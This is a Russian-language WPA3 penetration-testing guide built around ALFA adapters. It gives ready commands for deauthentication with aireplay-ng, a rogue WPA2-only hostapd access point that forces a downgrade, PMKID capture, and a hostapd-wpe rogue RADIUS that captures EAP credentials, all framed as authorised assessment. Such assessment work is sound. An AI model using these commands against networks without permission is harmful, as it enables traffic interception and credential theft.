
Тестирование безопасности WPA3 с адаптерами ALFA (2026)
Оглавление
WPA3 представляет значительное улучшение по сравнению с WPA2 в части безопасности как персональных, так и корпоративных беспроводных сетей. Simultaneous Authentication of Equals (SAE) заменяет рукопожатие Pre-Shared Key (PSK) аутентифицированным обменом ключами на основе пароля, устойчивым к автономным атакам по словарю. Protected Management Frames (PMF) являются обязательными. Прямая секретность встроена изначально.
Тем не менее WPA3 не лишён уязвимостей. Исследование Dragonblood (2019) выявило атаки по сторонним каналам и уязвимости отказа в обслуживании в реализации рукопожатия SAE. Режим перехода вносит поверхности атаки для понижения версии. Корпоративные развёртывания сталкиваются с теми же слабостями проверки сертификатов 802.1X, что и WPA2-Enterprise. Данное руководство охватывает полную методологию тестирования безопасности WPA3 с использованием адаптеров ALFA Network, обеспечивающих стабильность режима мониторинга и возможность инъекции пакетов, необходимые для тщательной оценки.
Основы WPA3 для специалистов по безопасности#
SAE: Simultaneous Authentication of Equals#
SAE заменяет четырёхстороннее рукопожатие WPA2-PSK на обмен с нулевым разглашением на основе протокола обмена ключами Dragonfly. Ключевое свойство, важное для тестирования безопасности, — прямая секретность: даже если пароль Wi-Fi впоследствии окажется скомпрометированным, ранее захваченный трафик не может быть расшифрован. Это устраняет основную ценность автономного взлома парольных фраз против сети только с SAE.
SAE также устраняет уязвимость к атакам PMKID, которая была характерна для WPA2. Не существует эквивалентного артефакта, поддающегося автономному взлому, который пассивный злоумышленник мог бы извлечь из SAE-ассоциации.
PMF: обязателен в WPA3#
802.11w Protected Management Frames обязательны в WPA3. Фреймы деаутентификации и разассоциации криптографически защищены, что предотвращает поддельные deauth-атаки, тривиально эффективные против сетей WPA2 без PMF. Сеть только с WPA3 должна быть устойчива к ускорению захвата рукопожатий на основе деаутентификации.
WPA3 Transition Mode#
Наиболее распространённый сценарий реального развёртывания — WPA3 Transition Mode: точка доступа одновременно принимает аутентификацию как WPA3-SAE, так и WPA2-PSK для сохранения обратной совместимости с устройствами без поддержки WPA3. Этот режим является основной поверхностью атаки в современных корпоративных средах — он повторно вносит уязвимость рукопожатия WPA2 PSK в сеть, рекламирующую WPA3.
WPA3-Enterprise#
WPA3-Enterprise предписывает 192-битный режим безопасности с использованием GCMP-256 и HMAC-SHA-384, с взаимной аутентификацией на основе сертификатов. Он решает те же уязвимости проверки сертификатов, что и WPA2-Enterprise, если не развёрнут должным образом. Методология тестирования уровня 802.1X рассмотрена в методологии оценки безопасности корпоративных беспроводных сетей.
Тестовая среда и требования к адаптерам#
Выбор адаптера#
Тестирование WPA3 требует адаптера с надёжным режимом мониторинга, поддержкой инъекции и — для сетей WPA3 на 6 ГГц — трёхдиапазонных возможностей:
- AWUS036AXML — Необходим для сетей WPA3 Wi-Fi 6E (6 ГГц). Чипсет Mediatek MT7921AUN. Полная поддержка режима мониторинга и инъекций в Kali Linux с ядром 5.18+. Единственный адаптер ALFA, охватывающий каналы 6 ГГц, где развёртывания только с WPA3 становятся всё более распространёнными.
- AWUS036ACH — Подходит для тестирования WPA3 на 2,4/5 ГГц. Чипсет RTL8812AU. Максимальная совместимость с инструментарием aircrack-ng и широчайшая поддержка драйверов в разных версиях Kali Linux.
Включение режима мониторинга#
# Завершить мешающие процессы
sudo airmon-ng check kill
# Запустить режим мониторинга
sudo airmon-ng start wlan0
# Проверить интерфейс мониторинга
iwconfig wlan0monПолное руководство по настройке режима мониторинга см. в Включение режима мониторинга в Kali Linux.
Идентификация сетей WPA3 в результатах сканирования#
# Пассивное сканирование всех диапазонов
sudo airodump-ng wlan0mon --band abg -w wpa3_scan
# Фильтрация сетей WPA3 в результатах
sudo airodump-ng wlan0mon --band abg | grep -i "SAE\|WPA3"В выводе airodump-ng сети WPA3-SAE отображаются с WPA3 SAE в столбце AUTH. Сети в режиме перехода показывают WPA2 WPA3 SAE PSK. Сети с улучшенным шифрованием Open (OWE) показывают OWE.
Фаза 1: Захват и анализ рукопожатия SAE#
Ограничения пассивного захвата#
В отличие от WPA2, рукопожатия SAE не могут использоваться для автономных атак по словарю. Захват фреймов SAE commit и confirm несложен с любым адаптером в режиме мониторинга, однако захваченный материал не даёт поддающегося взлому хеша. Цель захвата фреймов SAE — анализ на уровне протокола: проверка того, что используется правильный вариант SAE, подтверждение согласования PMF и обеспечение доказательств в отчёте об оценке.
# Захват на канале целевой точки доступа
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w sae_capture wlan0mon
# Анализ захвата в Wireshark
# Фильтр: wlan.bssid == aa:bb:cc:dd:ee:ff && wlan.fc.type_subtype == 0x000b
# (0x000b = Authentication frame)
wireshark -r sae_capture-01.capВ фреймах аутентификации проверьте обмен SAE commit и confirm. Информационный элемент RSN в beacon-фреймах должен показывать:
- AKM Suite: 00-0F-AC:8 (SAE) для WPA3-Personal
- PMF: Required (бит MFPR установлен в RSN Capabilities)
Тестирование PMKID на сетях SAE#
Инструменты типа hcxdumptool будут пытаться извлечь PMKID из всех сетей, однако сети SAE не раскрывают поддающийся взлому PMKID. Запуск инструмента целесообразен для подтверждения отсутствия уязвимости WPA2 PMKID:
# Попытка захвата PMKID — сети SAE не должны давать поддающийся взлому PMKID
sudo hcxdumptool -i wlan0mon -o wpa3_pmkid.pcapng --enable_status=3
# Конвертация и проверка
hcxpcapngtool -o wpa3_hashes.hc22000 wpa3_pmkid.pcapng
# Пустой или отсутствующий файл хешей подтверждает отсутствие уязвимости WPA2 PMKID
wc -l wpa3_hashes.hc22000Если hcxpcapngtool выводит заполненный файл .hc22000 для сети, рекламируемой как WPA3-only, это указывает на то, что точка доступа работает в режиме перехода и раскрывает WPA2 PMKID — значимая находка.
Фаза 2: Тестирование атаки понижения версии в режиме перехода#
Поверхность атаки при понижении версии#
WPA3 Transition Mode — наиболее существенная уязвимость WPA3 в современных корпоративных средах. Когда точка доступа работает в режиме перехода, она принимает ассоциации как SAE, так и PSK. Злоумышленник, способный наблюдать probe-запросы клиентов, может создать мошенническую точку доступа, представляющую только возможности WPA2-PSK для того же SSID — если клиент подключается без требования SAE, захватывается стандартное четырёхстороннее рукопожатие WPA2, которое может быть атаковано в автономном режиме.
Процедура тестирования#
# Шаг 1: Подтвердить, что цель находится в режиме перехода (показывает WPA2+WPA3 в airodump-ng)
sudo airodump-ng wlan0mon --band abg | grep "TARGET_SSID"
# Шаг 2: Захватить beacon легитимной точки доступа для фиксации канала и конфигурации
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w transition_recon wlan0mon
# Шаг 3: Создать мошенническую точку доступа только с WPA2 на том же канале с помощью hostapd
# Создать /tmp/rogue_wpa2.conf:
cat > /tmp/rogue_wpa2.conf << 'EOF'
interface=wlan1
driver=nl80211
ssid=TARGET_SSID
channel=6
hw_mode=g
wpa=2
wpa_passphrase=TestPassphrase123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF
sudo hostapd /tmp/rogue_wpa2.conf &
# Шаг 4: Отслеживать ассоциации клиентов с мошеннической точкой доступа
sudo airodump-ng -c 6 --bssid ROGUE_BSSID -w downgrade_capture wlan0monНаходка Critical: Если клиент, ранее подключавшийся через SAE, ассоциируется с мошеннической точкой доступа только с WPA2 (что подтверждается четырёхсторонним рукопожатием в файле захвата), ОС клиента не применяет требование WPA3-SAE. Это является успешной атакой понижения версии.
Условие Pass: Клиент игнорирует точку доступа только с WPA2 или отображает оповещение и не завершает рукопожатие WPA2.
Индикатор понижения версии в выводе hcxpcapngtool#
# Конвертация захвата мошеннической точки доступа — наличие хеша подтверждает ассоциацию WPA2
hcxpcapngtool -o downgrade_hash.hc22000 downgrade_capture-01.cap
cat downgrade_hash.hc22000
# Непустой вывод = атака понижения версии прошла успешноФаза 3: Оценка уязвимостей Dragonblood#
Предыстория#
Исследование Dragonblood (Vanhoef & Ronen, 2019) выявило множество уязвимостей в реализации рукопожатия SAE:
- CVE-2019-9494 / CVE-2019-9496: Атаки по сторонним каналам (на основе кеша и по времени) против фрейма SAE commit, позволяющие автономные атаки по словарю против непропатченных реализаций
- CVE-2019-9499: Обход подтверждения SAE, ведущий к понижению WPA3-Personal до WPA2-PSK
- DoS через флудинг SAE commit: Истощение таблиц состояний точки доступа путём отправки большого числа фреймов SAE commit
Большинство современных прошивок точек доступа устранило исходные уязвимости Dragonblood. Тем не менее тестирование на их наличие остаётся актуальным в средах со старыми или непропатченными прошивками.
Тестирование механизма anti-clogging в SAE#
WPA3-SAE включает механизм anti-clogging для предотвращения DoS через флудинг commit-фреймов. Проверьте, правильно ли целевая точка доступа реализует anti-clogging:
# Установить hcxtools
sudo apt install hcxtools
# Использовать hcxdumptool для наблюдения за ограничением частоты обмена фреймами SAE commit/confirm
sudo hcxdumptool -i wlan0mon -o dragonblood_test.pcapng --enable_status=3
# В Wireshark применить фильтр для фреймов аутентификации и наблюдать:
# wlan.fc.type_subtype == 0x000b
# Искать ответы Anti-Clogging Token (ACT) во фреймах commit
wireshark -r dragonblood_test.pcapngПри корректно реализованной точке доступа быстрые SAE commit-запросы с нескольких исходных MAC-адресов должны инициировать ответы с Anti-Clogging Token (точка доступа возвращает токен, который должен быть включён в последующие commit-фреймы). Точки доступа, не реализующие ACT, уязвимы к DoS через флудинг SAE commit.
Проверка версии прошивки точки доступа#
Версия прошивки является надёжным индикатором статуса патчей. Сравните обнаруженную версию прошивки точки доступа с рекомендациями по безопасности производителя:
- Cisco: Security Advisory cisco-sa-wpa3-sae-side-channel (2019)
- Aruba: ArubaOS 8.6+ устраняет Dragonblood
- Ubiquiti: UniFi Network 6.0+ устраняет Dragonblood
- MikroTik: RouterOS 6.45.7+ устраняет Dragonblood
Задокументируйте версию прошивки точки доступа в отчёте об оценке. Точка доступа с прошивкой, предшествующей этим выпускам, должна быть помечена как потенциально уязвимая вне зависимости от того, была ли активная эксплуатация подтверждена.
Фаза 4: Тестирование применения PMF в сетях WPA3#
Почему тестирование PMF по-прежнему актуально#
Несмотря на то что PMF обязателен в WPA3, тестирование фактического поведения применения важно по следующим причинам:
- Точки доступа в режиме перехода могут иметь PMF в состоянии «capable» вместо «required» на пути WPA2, допуская deauth-атаки против клиентов, подключённых через WPA2
- Неправильная конфигурация точки доступа может привести к тому, что PMF не согласовывается даже при SAE-ассоциациях
- Клиентские реализации могут некорректно применять PMF, даже когда точка доступа рекламирует его как обязательный
Тест деаутентификации#
# Попытка деаутентификации тестового клиента, ассоциированного через WPA3-SAE
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
# Ожидаемый результат для корректно настроенной сети WPA3:
# - Тестовый клиент НЕ отключается (защищённые PMF управляющие фреймы отбрасываются)
# - airodump-ng не показывает захваченного рукопожатия
# Условие сбоя (находка):
# - Тестовый клиент отключается и переассоциируется
# - airodump-ng захватывает новое рукопожатиеPMF Capable vs. Required#
Проверьте информационный элемент RSN в beacon-фреймах для подтверждения конфигурации PMF:
# Захват beacon-фреймов и декодирование RSN IE
sudo tshark -i wlan0mon -f "wlan type mgt subtype beacon and wlan.bssid == aa:bb:cc:dd:ee:ff" \
-T fields -e wlan_mgt.rsn.capabilities.mfpc -e wlan_mgt.rsn.capabilities.mfpr \
-c 5 2>/dev/nullИнтерпретация вывода:
1,1— PMF Required (MFPR=1, MFPC=1): корректно для WPA31,0— PMF Capable, но не Required: находка Medium для сетей WPA3, High для корпоративных SSID0,0— PMF Disabled: находка High для любой сети, рекламируемой как WPA3; свидетельствует о неправильной конфигурации точки доступа
Фаза 5: Тестирование OWE (Opportunistic Wireless Encryption)#
Обзор OWE#
OWE (Wi-Fi Enhanced Open) — замена WPA3 для полностью открытых (незашифрованных) гостевых сетей. OWE выполняет неаутентифицированный обмен ключами Диффи-Хеллмана для установления пошифрования на уровне сессии без необходимости ввода пароля. Он защищает от пассивного прослушивания в гостевых сетях, но не обеспечивает аутентификацию.
Тестирование OWE Transition Mode#
Многие точки доступа развёртывают OWE в режиме перехода вместе с устаревшим открытым SSID (открытый SSID скрыт, OWE SSID виден). Проверьте, можно ли принудить клиентов подключиться к устаревшему открытому SSID:
# Сканирование скрытых SSID в паре с сетями OWE
sudo airodump-ng wlan0mon --band abg | grep -E "OWE|\<length: 0\>"
# Скрытый SSID без шифрования в паре с OWE SSID является переходным SSID
# Клиенты с поддержкой WPA3 должны предпочитать OWE; устаревшие клиенты переходят на открытую сетьНаходка: Если клиент с поддержкой WPA3 подключается к открытому переходному SSID вместо OWE SSID, ОС клиента некорректно обрабатывает OWE Transition Mode. Весь трафик этого клиента передаётся в незашифрованном виде.
Фаза 6: Оценка WPA3-Enterprise#
Проверка 192-битного режима безопасности#
WPA3-Enterprise предписывает шифрование GCMP-256 и аутентификацию HMAC-SHA-384 в 192-битном режиме безопасности. Проверьте через RSN IE в beacon-фреймах:
# Захват и декодирование RSN IE для корпоративного SSID
sudo tshark -i wlan0mon -f "wlan type mgt subtype beacon and wlan.bssid == aa:bb:cc:dd:ee:ff" \
-T fields -e wlan_mgt.rsn.pcs.type -e wlan_mgt.rsn.akms.type \
-c 10 2>/dev/nullОжидаемые значения для WPA3-Enterprise 192-bit:
- Pairwise Cipher Suite: GCMP-256 (00-0F-AC:9)
- AKM Suite: EAP-SHA384 (00-0F-AC:12) или FT-EAP-SHA384 (00-0F-AC:13)
Наличие CCMP-128 в сети WPA3-Enterprise является находкой Medium; точка доступа не применяет требование 192-битной безопасности.
Тестирование с мошенническим RADIUS#
WPA3-Enterprise уязвима к атакам с мошенническим RADIUS, если клиенты не проверяют сертификат сервера. Методология тестирования идентична WPA2-Enterprise:
# Развернуть мошенническую точку доступа с мошенническим RADIUS с помощью hostapd-wpe
sudo apt install hostapd-wpe
# Отредактировать /etc/hostapd-wpe/hostapd-wpe.conf для целевого SSID и канала
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# Отслеживать захваченные хеши учётных данныхПолную процедуру тестирования EAP/RADIUS см. в методологии оценки безопасности корпоративных беспроводных сетей.
Справочник инструментов для тестирования WPA3#
| Инструмент | Назначение | Адаптер | Ключевая команда |
|---|---|---|---|
| airodump-ng | Обнаружение сетей WPA3, захват фреймов SAE | AWUS036AXML / AWUS036ACH | sudo airodump-ng wlan0mon --band abg |
| hcxdumptool | Захват PMKID/SAE, обнаружение режима перехода | AWUS036AXML | sudo hcxdumptool -i wlan0mon -o out.pcapng --enable_status=3 |
| hcxpcapngtool | Конвертация захватов, обнаружение уязвимости WPA2 в режиме перехода | N/A (постобработка) | hcxpcapngtool -o hash.hc22000 cap.pcapng |
| Wireshark / tshark | Анализ RSN IE, возможности PMF, инспекция фреймов SAE | Любой (через файл захвата) | tshark -i wlan0mon -T fields -e wlan_mgt.rsn.capabilities.mfpr |
| aireplay-ng | Тестирование применения PMF (деаутентификация) | AWUS036ACH | sudo aireplay-ng --deauth 10 -a BSSID wlan0mon |
| hostapd | Мошенническая точка доступа только с WPA2 для тестирования понижения версии | AWUS036ACH | sudo hostapd /tmp/rogue_wpa2.conf |
| hostapd-wpe | Мошеннический RADIUS для тестирования EAP в WPA3-Enterprise | AWUS036ACH | sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf |
Сводка находок для оценок WPA3#
| ID | Severity | Находка | Условие |
|---|---|---|---|
| W3-01 | Critical | Понижение WPA3 до WPA2 прошло успешно; рукопожатие захвачено и поддаётся взлому | Клиент ассоциировался с мошеннической точкой доступа только с WPA2; хеш восстановлен |
| W3-02 | High | Режим перехода без применения SAE; WPA2 PMKID раскрыт | hcxpcapngtool возвращает поддающийся взлому хеш из сети WPA3 |
| W3-03 | High | PMF не применяется на SSID WPA3; deauth-атака прошла успешно | Тестовый клиент отключён деаутентификацией aireplay-ng |
| W3-04 | High | Клиенты WPA3-Enterprise принимают мошеннический RADIUS без предупреждения о сертификате | hostapd-wpe захватывает EAP-учётные данные тестового клиента |
| W3-05 | Medium | PMF Capable, но не Required на SSID WPA3 | RSN IE показывает MFPC=1, MFPR=0 |
| W3-06 | Medium | WPA3-Enterprise не использует 192-битный режим безопасности | RSN IE показывает CCMP-128 вместо GCMP-256 |
| W3-07 | Medium | Прошивка точки доступа предшествует патчам Dragonblood | Сравнение версии прошивки с рекомендациями производителя |
| W3-08 | Low | OWE Transition Mode; устаревшие клиенты подключаются в незашифрованном виде | Открытый SSID виден рядом с OWE SSID |
常見問題
В чём отличия WPA3 от WPA2 при тестировании безопасности?
WPA3 использует рукопожатие SAE вместо PSK, обеспечивает прямую секретность и устойчив к офлайн-словарным атакам. PMF обязателен, но переходный режим создаёт поверхность для атак на понижение уровня.
Можно ли офлайн-взломать после захвата рукопожатия SAE?
Нет. Чистые SAE-сети не генерируют взламываемые хэши. Захват SAE-кадров используется только для анализа уровня протокола, подтверждения корректного варианта и согласования PMF.
Что такое атака на понижение уровня в переходном режиме WPA3?
AP в переходном режиме одновременно принимает SAE и PSK. Злоумышленник создаёт поддельный AP только с WPA2, если клиент не требует SAE, происходит понижение уровня, рукопожатие можно взломать офлайн.
Нужен ли адаптер 6 ГГц для тестирования WPA3?
Только для тестирования сетей WPA3 в диапазоне 6 ГГц нужен AWUS036AXML. Для тестирования WPA3 на 2.4/5 ГГц достаточно AWUS036ACH.
Нужно ли ещё тестировать уязвимости Dragonblood?
Современные прошивки AP в основном исправлены, но в средах со старым или неисправленным ПО всё ещё нужно тестировать боковые атаки CVE-2019-9494 и SAE commit flood DoS.
Связанные ресурсы#
- Оценка безопасности корпоративных беспроводных сетей: полная методология
- Руководство по инъекции пакетов: тестирование адаптера WiFi с aireplay-ng
- Включение режима мониторинга в Kali Linux
Источники#
Здесь пока нет статей.